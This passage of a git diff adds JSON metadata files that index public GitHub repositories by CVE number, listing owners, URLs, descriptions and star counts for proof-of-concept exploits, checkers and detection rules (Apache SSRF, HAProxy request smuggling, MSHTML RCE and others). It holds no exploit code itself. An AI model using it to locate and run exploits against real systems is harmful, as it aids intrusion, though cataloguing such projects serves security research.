+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 788783751,
+ "name": "CVE-2021-4034",
+ "full_name": "ASG-CASTLE\/CVE-2021-4034",
+ "owner": {
+ "login": "ASG-CASTLE",
+ "id": 160751832,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/160751832?v=4",
+ "html_url": "https:\/\/github.com\/ASG-CASTLE"
+ },
+ "html_url": "https:\/\/github.com\/ASG-CASTLE\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-19T04:33:14Z",
+ "updated_at": "2024-04-19T04:33:14Z",
+ "pushed_at": "2024-04-19T04:44:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802783784,
+ "name": "Exploiting-PwnKit-CVE-2021-4034-",
+ "full_name": "X-Projetion\/Exploiting-PwnKit-CVE-2021-4034-",
+ "owner": {
+ "login": "X-Projetion",
+ "id": 161194427,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4",
+ "html_url": "https:\/\/github.com\/X-Projetion"
+ },
+ "html_url": "https:\/\/github.com\/X-Projetion\/Exploiting-PwnKit-CVE-2021-4034-",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-19T08:58:00Z",
+ "updated_at": "2024-05-19T09:00:24Z",
+ "pushed_at": "2024-05-19T09:00:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40345.json b/2021/CVE-2021-40345.json
new file mode 100644
index 0000000000..d9adf31f55
--- /dev/null
+++ b/2021/CVE-2021-40345.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 373309719,
+ "name": "NagiosXI-RCE-all-version-CVE-2021-40345",
+ "full_name": "ArianeBlow\/NagiosXI-RCE-all-version-CVE-2021-40345",
+ "owner": {
+ "login": "ArianeBlow",
+ "id": 61753065,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61753065?v=4",
+ "html_url": "https:\/\/github.com\/ArianeBlow"
+ },
+ "html_url": "https:\/\/github.com\/ArianeBlow\/NagiosXI-RCE-all-version-CVE-2021-40345",
+ "description": "RFI to RCE Nagios\/NagiosXI exploitation",
+ "fork": false,
+ "created_at": "2021-06-02T21:39:53Z",
+ "updated_at": "2023-12-05T10:24:02Z",
+ "pushed_at": "2022-03-03T17:08:52Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40346.json b/2021/CVE-2021-40346.json
new file mode 100644
index 0000000000..d6835a434f
--- /dev/null
+++ b/2021/CVE-2021-40346.json
@@ -0,0 +1,152 @@
+[
+ {
+ "id": 404512556,
+ "name": "CVE-2021-40346",
+ "full_name": "knqyf263\/CVE-2021-40346",
+ "owner": {
+ "login": "knqyf263",
+ "id": 2253692,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4",
+ "html_url": "https:\/\/github.com\/knqyf263"
+ },
+ "html_url": "https:\/\/github.com\/knqyf263\/CVE-2021-40346",
+ "description": "CVE-2021-40346 PoC (HAProxy HTTP Smuggling)",
+ "fork": false,
+ "created_at": "2021-09-08T22:26:19Z",
+ "updated_at": "2024-05-13T17:32:59Z",
+ "pushed_at": "2021-09-08T22:37:15Z",
+ "stargazers_count": 39,
+ "watchers_count": 39,
+ "has_discussions": false,
+ "forks_count": 15,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 15,
+ "watchers": 39,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 405007433,
+ "name": "CVE-2021-40346-POC",
+ "full_name": "donky16\/CVE-2021-40346-POC",
+ "owner": {
+ "login": "donky16",
+ "id": 24637333,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24637333?v=4",
+ "html_url": "https:\/\/github.com\/donky16"
+ },
+ "html_url": "https:\/\/github.com\/donky16\/CVE-2021-40346-POC",
+ "description": "CVE-2021-40346 integer overflow enables http smuggling",
+ "fork": false,
+ "created_at": "2021-09-10T08:18:20Z",
+ "updated_at": "2024-04-24T17:28:26Z",
+ "pushed_at": "2021-09-28T08:28:18Z",
+ "stargazers_count": 34,
+ "watchers_count": 34,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 34,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 405232580,
+ "name": "CVE-2021-40346",
+ "full_name": "alikarimi999\/CVE-2021-40346",
+ "owner": {
+ "login": "alikarimi999",
+ "id": 90207127,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90207127?v=4",
+ "html_url": "https:\/\/github.com\/alikarimi999"
+ },
+ "html_url": "https:\/\/github.com\/alikarimi999\/CVE-2021-40346",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-10T23:02:45Z",
+ "updated_at": "2023-09-28T11:31:20Z",
+ "pushed_at": "2021-09-13T20:46:19Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 425818031,
+ "name": "HAProxy_CVE-2021-40346",
+ "full_name": "Vulnmachines\/HAProxy_CVE-2021-40346",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/HAProxy_CVE-2021-40346",
+ "description": "HAProxy CVE-2021-40346",
+ "fork": false,
+ "created_at": "2021-11-08T11:53:45Z",
+ "updated_at": "2022-09-21T01:42:54Z",
+ "pushed_at": "2022-09-20T10:30:36Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 451651719,
+ "name": "CVE-2021-40346",
+ "full_name": "alexOarga\/CVE-2021-40346",
+ "owner": {
+ "login": "alexOarga",
+ "id": 26066039,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26066039?v=4",
+ "html_url": "https:\/\/github.com\/alexOarga"
+ },
+ "html_url": "https:\/\/github.com\/alexOarga\/CVE-2021-40346",
+ "description": "CVE-2021-40346 - HaProxy HTTP request smuggling through integer overflow",
+ "fork": false,
+ "created_at": "2022-01-24T22:16:39Z",
+ "updated_at": "2022-01-24T22:18:20Z",
+ "pushed_at": "2022-01-24T22:18:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40352.json b/2021/CVE-2021-40352.json
new file mode 100644
index 0000000000..daede6d871
--- /dev/null
+++ b/2021/CVE-2021-40352.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 401973989,
+ "name": "CVE-2021-40352",
+ "full_name": "allenenosh\/CVE-2021-40352",
+ "owner": {
+ "login": "allenenosh",
+ "id": 49747518,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49747518?v=4",
+ "html_url": "https:\/\/github.com\/allenenosh"
+ },
+ "html_url": "https:\/\/github.com\/allenenosh\/CVE-2021-40352",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-01T07:39:27Z",
+ "updated_at": "2021-11-22T11:09:11Z",
+ "pushed_at": "2021-09-01T09:04:57Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40353.json b/2021/CVE-2021-40353.json
new file mode 100644
index 0000000000..48c930bf3c
--- /dev/null
+++ b/2021/CVE-2021-40353.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 401852393,
+ "name": "CVE-2021-40353",
+ "full_name": "5qu1n7\/CVE-2021-40353",
+ "owner": {
+ "login": "5qu1n7",
+ "id": 44474414,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44474414?v=4",
+ "html_url": "https:\/\/github.com\/5qu1n7"
+ },
+ "html_url": "https:\/\/github.com\/5qu1n7\/CVE-2021-40353",
+ "description": "CVE-2021-40353 openSIS 8.0 SQL Injection Vulnerability",
+ "fork": false,
+ "created_at": "2021-08-31T21:51:14Z",
+ "updated_at": "2023-03-22T16:11:23Z",
+ "pushed_at": "2021-09-03T17:48:14Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40373.json b/2021/CVE-2021-40373.json
new file mode 100644
index 0000000000..a34b73ce41
--- /dev/null
+++ b/2021/CVE-2021-40373.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 401705362,
+ "name": "CVE-2021-40373",
+ "full_name": "maikroservice\/CVE-2021-40373",
+ "owner": {
+ "login": "maikroservice",
+ "id": 20245897,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20245897?v=4",
+ "html_url": "https:\/\/github.com\/maikroservice"
+ },
+ "html_url": "https:\/\/github.com\/maikroservice\/CVE-2021-40373",
+ "description": "CVE-2021-40373 - remote code execution",
+ "fork": false,
+ "created_at": "2021-08-31T13:03:10Z",
+ "updated_at": "2022-03-24T09:34:07Z",
+ "pushed_at": "2022-03-24T09:34:04Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40374.json b/2021/CVE-2021-40374.json
new file mode 100644
index 0000000000..e291e19aba
--- /dev/null
+++ b/2021/CVE-2021-40374.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 401673817,
+ "name": "CVE-2021-40374",
+ "full_name": "DCKento\/CVE-2021-40374",
+ "owner": {
+ "login": "DCKento",
+ "id": 20635370,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20635370?v=4",
+ "html_url": "https:\/\/github.com\/DCKento"
+ },
+ "html_url": "https:\/\/github.com\/DCKento\/CVE-2021-40374",
+ "description": "Stored Cross-site Scripting in OpenEyes 3.5.1",
+ "fork": false,
+ "created_at": "2021-08-31T11:12:49Z",
+ "updated_at": "2023-08-10T10:40:30Z",
+ "pushed_at": "2021-10-30T14:48:13Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40375.json b/2021/CVE-2021-40375.json
new file mode 100644
index 0000000000..49f4c54f0e
--- /dev/null
+++ b/2021/CVE-2021-40375.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 401673921,
+ "name": "CVE-2021-40375",
+ "full_name": "DCKento\/CVE-2021-40375",
+ "owner": {
+ "login": "DCKento",
+ "id": 20635370,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20635370?v=4",
+ "html_url": "https:\/\/github.com\/DCKento"
+ },
+ "html_url": "https:\/\/github.com\/DCKento\/CVE-2021-40375",
+ "description": "Broken Access Control in OpenEyes 3.5.1",
+ "fork": false,
+ "created_at": "2021-08-31T11:13:14Z",
+ "updated_at": "2023-08-10T10:39:48Z",
+ "pushed_at": "2021-10-30T14:49:36Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-4043.json b/2021/CVE-2021-4043.json
new file mode 100644
index 0000000000..d3c30a427c
--- /dev/null
+++ b/2021/CVE-2021-4043.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 453690906,
+ "name": "PwnKit-Hunter",
+ "full_name": "cyberark\/PwnKit-Hunter",
+ "owner": {
+ "login": "cyberark",
+ "id": 30869256,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30869256?v=4",
+ "html_url": "https:\/\/github.com\/cyberark"
+ },
+ "html_url": "https:\/\/github.com\/cyberark\/PwnKit-Hunter",
+ "description": "PwnKit-Hunter is here to help you check if your systems are vulnerable to CVE-2021-4043, a.k.a. PwnKit",
+ "fork": false,
+ "created_at": "2022-01-30T13:42:16Z",
+ "updated_at": "2024-03-06T03:29:04Z",
+ "pushed_at": "2022-02-01T12:18:42Z",
+ "stargazers_count": 25,
+ "watchers_count": 25,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 25,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40438.json b/2021/CVE-2021-40438.json
new file mode 100644
index 0000000000..3ad73df264
--- /dev/null
+++ b/2021/CVE-2021-40438.json
@@ -0,0 +1,287 @@
+[
+ {
+ "id": 418310369,
+ "name": "CVE-2021-40438",
+ "full_name": "xiaojiangxl\/CVE-2021-40438",
+ "owner": {
+ "login": "xiaojiangxl",
+ "id": 58814935,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58814935?v=4",
+ "html_url": "https:\/\/github.com\/xiaojiangxl"
+ },
+ "html_url": "https:\/\/github.com\/xiaojiangxl\/CVE-2021-40438",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-18T02:02:43Z",
+ "updated_at": "2024-06-13T21:21:33Z",
+ "pushed_at": "2021-10-18T02:42:25Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 420650239,
+ "name": "CVE-2021-40438",
+ "full_name": "sixpacksecurity\/CVE-2021-40438",
+ "owner": {
+ "login": "sixpacksecurity",
+ "id": 91971692,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91971692?v=4",
+ "html_url": "https:\/\/github.com\/sixpacksecurity"
+ },
+ "html_url": "https:\/\/github.com\/sixpacksecurity\/CVE-2021-40438",
+ "description": "CVE-2021-40438 exploit PoC with Docker setup.",
+ "fork": false,
+ "created_at": "2021-10-24T10:18:08Z",
+ "updated_at": "2024-06-13T21:14:05Z",
+ "pushed_at": "2021-10-24T10:21:12Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 422182981,
+ "name": "CVE-2021-40438",
+ "full_name": "BabyTeam1024\/CVE-2021-40438",
+ "owner": {
+ "login": "BabyTeam1024",
+ "id": 74447452,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74447452?v=4",
+ "html_url": "https:\/\/github.com\/BabyTeam1024"
+ },
+ "html_url": "https:\/\/github.com\/BabyTeam1024\/CVE-2021-40438",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-28T11:48:12Z",
+ "updated_at": "2022-05-19T10:12:33Z",
+ "pushed_at": "2021-10-28T11:52:54Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 427124933,
+ "name": "apache-cve-poc",
+ "full_name": "ericmann\/apache-cve-poc",
+ "owner": {
+ "login": "ericmann",
+ "id": 605474,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/605474?v=4",
+ "html_url": "https:\/\/github.com\/ericmann"
+ },
+ "html_url": "https:\/\/github.com\/ericmann\/apache-cve-poc",
+ "description": "Dockerized Proof-of-Concept of CVE-2021-40438 in Apache 2.4.48.",
+ "fork": false,
+ "created_at": "2021-11-11T19:51:45Z",
+ "updated_at": "2021-11-11T19:53:46Z",
+ "pushed_at": "2021-11-11T19:53:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 433314465,
+ "name": "Sigma-Rule-for-CVE-2021-40438-exploitation-attempt",
+ "full_name": "pisut4152\/Sigma-Rule-for-CVE-2021-40438-exploitation-attempt",
+ "owner": {
+ "login": "pisut4152",
+ "id": 72641661,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72641661?v=4",
+ "html_url": "https:\/\/github.com\/pisut4152"
+ },
+ "html_url": "https:\/\/github.com\/pisut4152\/Sigma-Rule-for-CVE-2021-40438-exploitation-attempt",
+ "description": "Sigma-Rule-for-CVE-2021-40438-Attack-Attemp",
+ "fork": false,
+ "created_at": "2021-11-30T06:07:49Z",
+ "updated_at": "2021-12-03T00:25:02Z",
+ "pushed_at": "2021-11-30T06:08:15Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 477381613,
+ "name": "CVE-2021-40438",
+ "full_name": "Kashkovsky\/CVE-2021-40438",
+ "owner": {
+ "login": "Kashkovsky",
+ "id": 13631794,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13631794?v=4",
+ "html_url": "https:\/\/github.com\/Kashkovsky"
+ },
+ "html_url": "https:\/\/github.com\/Kashkovsky\/CVE-2021-40438",
+ "description": "Apache forward request CVE",
+ "fork": false,
+ "created_at": "2022-04-03T15:24:24Z",
+ "updated_at": "2024-05-13T15:04:40Z",
+ "pushed_at": "2022-04-03T18:34:35Z",
+ "stargazers_count": 15,
+ "watchers_count": 15,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 15,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 501852714,
+ "name": "CVE-2021-40438",
+ "full_name": "gassara-kys\/CVE-2021-40438",
+ "owner": {
+ "login": "gassara-kys",
+ "id": 25426601,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25426601?v=4",
+ "html_url": "https:\/\/github.com\/gassara-kys"
+ },
+ "html_url": "https:\/\/github.com\/gassara-kys\/CVE-2021-40438",
+ "description": "check CVE-2021-40438",
+ "fork": false,
+ "created_at": "2022-06-10T00:46:58Z",
+ "updated_at": "2024-02-01T23:15:24Z",
+ "pushed_at": "2022-06-10T00:56:32Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 730658177,
+ "name": "CVE-2021-40438-Apache-2.4.48-SSRF-exploit",
+ "full_name": "sergiovks\/CVE-2021-40438-Apache-2.4.48-SSRF-exploit",
+ "owner": {
+ "login": "sergiovks",
+ "id": 118485549,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118485549?v=4",
+ "html_url": "https:\/\/github.com\/sergiovks"
+ },
+ "html_url": "https:\/\/github.com\/sergiovks\/CVE-2021-40438-Apache-2.4.48-SSRF-exploit",
+ "description": "CVE-2021-40438 Apache <= 2.4.48 SSRF exploit",
+ "fork": false,
+ "created_at": "2023-12-12T11:56:23Z",
+ "updated_at": "2024-04-07T12:12:44Z",
+ "pushed_at": "2023-12-12T12:29:24Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "exploit",
+ "python",
+ "python3",
+ "script",
+ "server-side-request-forgery",
+ "ssrf"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802819222,
+ "name": "CVE-2021-40438",
+ "full_name": "Cappricio-Securities\/CVE-2021-40438",
+ "owner": {
+ "login": "Cappricio-Securities",
+ "id": 102907425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4",
+ "html_url": "https:\/\/github.com\/Cappricio-Securities"
+ },
+ "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2021-40438",
+ "description": "Apache <= 2.4.48 Mod_Proxy - Server-Side Request Forgery",
+ "fork": false,
+ "created_at": "2024-05-19T11:04:58Z",
+ "updated_at": "2024-06-24T07:46:24Z",
+ "pushed_at": "2024-06-24T07:42:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-40438",
+ "log4j",
+ "pentesting",
+ "vapt",
+ "wapt"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40444.json b/2021/CVE-2021-40444.json
new file mode 100644
index 0000000000..e3befeba82
--- /dev/null
+++ b/2021/CVE-2021-40444.json
@@ -0,0 +1,1068 @@
+[
+ {
+ "id": 404270939,
+ "name": "CVE-2021-40444",
+ "full_name": "ozergoker\/CVE-2021-40444",
+ "owner": {
+ "login": "ozergoker",
+ "id": 86879266,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86879266?v=4",
+ "html_url": "https:\/\/github.com\/ozergoker"
+ },
+ "html_url": "https:\/\/github.com\/ozergoker\/CVE-2021-40444",
+ "description": "Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-40444",
+ "fork": false,
+ "created_at": "2021-09-08T08:32:40Z",
+ "updated_at": "2024-06-13T21:12:39Z",
+ "pushed_at": "2021-09-29T11:39:26Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 404560139,
+ "name": "CVE-2021-40444",
+ "full_name": "DarkSprings\/CVE-2021-40444",
+ "owner": {
+ "login": "DarkSprings",
+ "id": 90366126,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90366126?v=4",
+ "html_url": "https:\/\/github.com\/DarkSprings"
+ },
+ "html_url": "https:\/\/github.com\/DarkSprings\/CVE-2021-40444",
+ "description": "CVE-2021-40444 POC",
+ "fork": false,
+ "created_at": "2021-09-09T02:30:26Z",
+ "updated_at": "2024-06-13T21:12:55Z",
+ "pushed_at": "2021-09-09T02:34:39Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 404570413,
+ "name": "CVE-2021-40444-POC",
+ "full_name": "rfcxv\/CVE-2021-40444-POC",
+ "owner": {
+ "login": "rfcxv",
+ "id": 90367910,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90367910?v=4",
+ "html_url": "https:\/\/github.com\/rfcxv"
+ },
+ "html_url": "https:\/\/github.com\/rfcxv\/CVE-2021-40444-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-09T03:15:57Z",
+ "updated_at": "2024-06-13T21:11:56Z",
+ "pushed_at": "2021-09-09T03:26:21Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 404667016,
+ "name": "CVE-2021-40444_EXP_JS",
+ "full_name": "bambooqj\/CVE-2021-40444_EXP_JS",
+ "owner": {
+ "login": "bambooqj",
+ "id": 20792621,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20792621?v=4",
+ "html_url": "https:\/\/github.com\/bambooqj"
+ },
+ "html_url": "https:\/\/github.com\/bambooqj\/CVE-2021-40444_EXP_JS",
+ "description": "根据已知样本反编译代码",
+ "fork": false,
+ "created_at": "2021-09-09T09:46:00Z",
+ "updated_at": "2024-06-22T12:55:17Z",
+ "pushed_at": "2021-09-09T09:46:32Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 404779804,
+ "name": "cve-2021-40444-analysis",
+ "full_name": "Immersive-Labs-Sec\/cve-2021-40444-analysis",
+ "owner": {
+ "login": "Immersive-Labs-Sec",
+ "id": 79456607,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79456607?v=4",
+ "html_url": "https:\/\/github.com\/Immersive-Labs-Sec"
+ },
+ "html_url": "https:\/\/github.com\/Immersive-Labs-Sec\/cve-2021-40444-analysis",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-09T15:43:08Z",
+ "updated_at": "2021-09-14T08:18:40Z",
+ "pushed_at": "2021-09-14T08:18:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 404899720,
+ "name": "CVE-2021-40444",
+ "full_name": "vysecurity\/CVE-2021-40444",
+ "owner": {
+ "login": "vysecurity",
+ "id": 3596242,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3596242?v=4",
